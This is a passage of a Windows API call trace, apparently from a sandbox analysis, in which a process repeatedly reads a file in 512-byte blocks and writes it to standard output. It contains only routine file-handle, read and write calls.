
(_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] GetFileType (hFile=0x4c) returned 0x1 [0107.532] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.532] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.533] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.533] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] GetFileType (hFile=0x4c) returned 0x1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.533] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.533] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, 
lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] GetFileType (hFile=0x4c) returned 0x1 [0107.534] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.534] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.534] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.534] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.535] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 
0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] GetFileType (hFile=0x4c) returned 0x1 [0107.535] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.535] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.536] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.536] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) 
returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.536] GetFileType (hFile=0x4c) returned 0x1 [0107.536] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.537] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.537] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.537] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.537] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.538] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.538] ReadFile 
(in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.538] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] GetFileType (hFile=0x4c) returned 0x1 [0107.538] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.538] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.539] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.539] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.539] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.539] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, 
lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.540] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.540] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.540] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.540] GetFileType (hFile=0x4c) returned 0x1 [0107.541] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.541] WriteFile (in: hFile=0x4c, 
